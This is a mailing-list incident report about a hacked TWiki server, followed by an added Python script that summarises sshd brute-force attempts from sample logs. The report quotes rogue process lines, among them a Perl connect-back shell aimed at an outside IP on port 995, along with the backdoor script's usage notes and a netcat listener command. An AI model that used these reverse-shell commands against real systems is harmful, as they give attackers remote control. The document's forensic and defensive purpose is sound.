Re: Wiki hacked?
+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package.
> That was a mistake - leaves you exposed to security flaws down the line...
OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install.
> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.
I've put in the twiki package from unstable but kept the machine pinned at
Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog -rr1.37|perl /var/tmp/backup.pl 126.96.36.199 995
22908 sh -c echo "uname -a";echo "id";/bin/sh
the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl <iptoolbox> <ncportlisten>
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
It's pointing at what looks like a Malaysian server 188.8.131.52 port 995,
which is pop3s.
I've killed those processes and moved the files.
There are loads of messages like:
Sep 25 14:06:14 onz sshd: Illegal user chloe from 184.108.40.206
from Sep 19th to today - looks like a brute-force attempt to log in?
It comes from these servers:
220.127.116.11 21:46 to 22:01 on Sep 19th
18.104.22.168 12:31 to 13:06 on Sep 20th
22.214.171.124 13:34 to 13:43 on Sep 20th
126.96.36.199 23:14 to 23:16 on Sep 21st
188.8.131.52 11:40 to 12:26 on Sep 22nd
184.108.40.206 at 18:06 on Sep 22nd
220.127.116.11 20:30 to 20:49 on Sep 22nd including a lot of messages like
Sep 22 20:47:12 onz sshd: reverse mapping checking getaddrinfo for
luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
18.104.22.168 14:42 to 15:04 on Sep 23rd
22.214.171.124 at 17:10 on Sep 23rd
and so on.
The original www-data failed login came from 126.96.36.199:
Sep 19 20:12:46 onz sshd: (pam_unix) authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=188.8.131.52 us
Sep 19 20:12:48 onz sshd: error: PAM: Authentication failure for
www-data from 184.108.40.206
Sep 19 20:12:59 onz sshd: error: PAM: Authentication failure for
www-data from 220.127.116.11
Sep 19 20:13:04 onz sshd: error: PAM: Have exhasted maximum number of
retries for service. for www-data from 18.104.22.168
OK - that's enough for tonight
Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/ play: http://www.chaos.org.uk/~wookey/
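The per-source tabulation of sshd brute-force windows in the message above was done by hand from the logs. The following is an added example, not code from the thread or from the server in question: a small Python parser for the sshd line shapes quoted there (Illegal user, PAM authentication failure, the "Have exhasted maximum number of retries" line, reverse-mapping warnings) that groups events per source address, produces the same "IP HH:MM to HH:MM on Mon DD" summary, and additionally flags any later successful login from a source that had been failing, which is the line an investigator most wants to find. The log lines embedded below are constructed for the example (RFC 5737 documentation addresses; only the hostname "onz" and the message formats come from the thread), and the threshold of three failures per source is an assumption.

```python
"""Summarise sshd brute-force activity per source address from syslog lines.

Added example; not from the original message. Parses the sshd line shapes
quoted in the thread and groups them per source IP so the time windows the
poster tabulated by hand fall out automatically.
"""
import re
from datetime import datetime

# Constructed sample log (not the real logs from the thread). Addresses are
# RFC 5737 documentation ranges; the hostname "onz" is kept from the thread.
SAMPLE_LOG = """\
Sep 19 20:12:46 onz sshd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.0.2.10 user=www-data
Sep 19 20:12:48 onz sshd: error: PAM: Authentication failure for www-data from 192.0.2.10
Sep 19 20:12:59 onz sshd: error: PAM: Authentication failure for www-data from 192.0.2.10
Sep 19 20:13:04 onz sshd: error: PAM: Have exhasted maximum number of retries for service. for www-data from 192.0.2.10
Sep 19 21:46:01 onz sshd: Illegal user chloe from 198.51.100.7
Sep 19 21:52:10 onz sshd: Illegal user admin from 198.51.100.7
Sep 19 22:01:33 onz sshd: Illegal user test from 198.51.100.7
Sep 20 12:31:00 onz sshd: Illegal user oracle from 203.0.113.5
Sep 20 13:06:45 onz sshd: Illegal user mysql from 203.0.113.5
Sep 22 18:06:30 onz sshd: Illegal user guest from 192.0.2.77
Sep 22 20:47:12 onz sshd: reverse mapping checking getaddrinfo for host.example failed - POSSIBLE BREAKIN ATTEMPT!
Sep 23 17:10:00 onz sshd: Accepted password for www-data from 203.0.113.5 port 40022 ssh2
"""

# Classic syslog prefix: "Mon DD HH:MM:SS host sshd[pid]: message" (no year).
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd(?:\[\d+\])?: (?P<msg>.*)$"
)

# Event patterns in the order they are tried. The "(pam_unix) authentication
# failure; ... rhost=" line duplicates the "PAM: Authentication failure" line
# that follows it, so it is deliberately not matched (avoids double counting).
EVENT_PATTERNS = [
    ("illegal_user", re.compile(r"Illegal user (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("auth_failure", re.compile(r"PAM: Authentication failure for (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("retries_exhausted", re.compile(
        r"maximum number of retries for service\. for (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("accepted", re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("reverse_mapping", re.compile(r"reverse mapping checking getaddrinfo for (?P<host>\S+) failed")),
]
FAILURE_KINDS = {"illegal_user", "auth_failure", "retries_exhausted"}


def parse_sshd_line(line):
    """Return {'ts', 'kind', 'user', 'ip'} for a recognised sshd line, else None."""
    m = SYSLOG_RE.match(line.strip())
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is
    # good enough for ordering events within one log rotation.
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    msg = m.group("msg")
    for kind, pat in EVENT_PATTERNS:
        e = pat.search(msg)
        if e:
            d = e.groupdict()
            return {"ts": ts, "kind": kind, "user": d.get("user"), "ip": d.get("ip")}
    return None


def summarize_sources(log_text, threshold=3):
    """Group failures per source IP and note any later successful login from it."""
    sources = {}
    for line in log_text.splitlines():
        ev = parse_sshd_line(line)
        if ev is None or ev["ip"] is None:      # unknown line or no source address
            continue
        rec = sources.setdefault(ev["ip"], {
            "first": None, "last": None, "failures": 0, "users": set(),
            "exhausted": False, "accepted_after": []})
        if ev["kind"] in FAILURE_KINDS:
            rec["failures"] += 1
            rec["first"] = ev["ts"] if rec["first"] is None else min(rec["first"], ev["ts"])
            rec["last"] = ev["ts"] if rec["last"] is None else max(rec["last"], ev["ts"])
            if ev["user"]:
                rec["users"].add(ev["user"])
            if ev["kind"] == "retries_exhausted":
                rec["exhausted"] = True
        elif ev["kind"] == "accepted" and rec["failures"] > 0:
            # A success from an address that had been failing: the line that matters.
            rec["accepted_after"].append((ev["ts"], ev["user"]))
    for rec in sources.values():
        rec["brute_force"] = rec["failures"] >= threshold or rec["exhausted"]
    return sources


def format_window(ip, rec):
    """Render one source the way the thread tabulated them: 'ip HH:MM to HH:MM on Mon DD'."""
    first, last = rec["first"], rec["last"]
    if first is None:
        when = "no failed attempts"
    elif first.strftime("%b %d %H:%M") == last.strftime("%b %d %H:%M"):
        when = f"at {first:%H:%M} on {first:%b %d}"
    elif first.date() == last.date():
        when = f"{first:%H:%M} to {last:%H:%M} on {first:%b %d}"
    else:
        when = f"{first:%b %d %H:%M} to {last:%b %d %H:%M}"
    out = f"{ip} {when} ({rec['failures']} failed attempts"
    if rec["users"]:
        out += ", users: " + ", ".join(sorted(rec["users"]))
    out += ")"
    for ts, user in rec["accepted_after"]:
        out += f" ** ACCEPTED login as {user} at {ts:%b %d %H:%M}"
    return out


if __name__ == "__main__":
    for ip, rec in sorted(summarize_sources(SAMPLE_LOG).items(),
                          key=lambda kv: kv[1]["first"] or datetime.max):
        flag = "BRUTE-FORCE " if rec["brute_force"] else ""
        print(flag + format_window(ip, rec))
```

Run against a real /var/log/auth.log the parser will also pick up sshd lines with a `[pid]` suffix; sources below the threshold are still listed so that a single "Accepted" login after a couple of quiet failures, as constructed for 203.0.113.5 above, is not hidden by the brute-force filter.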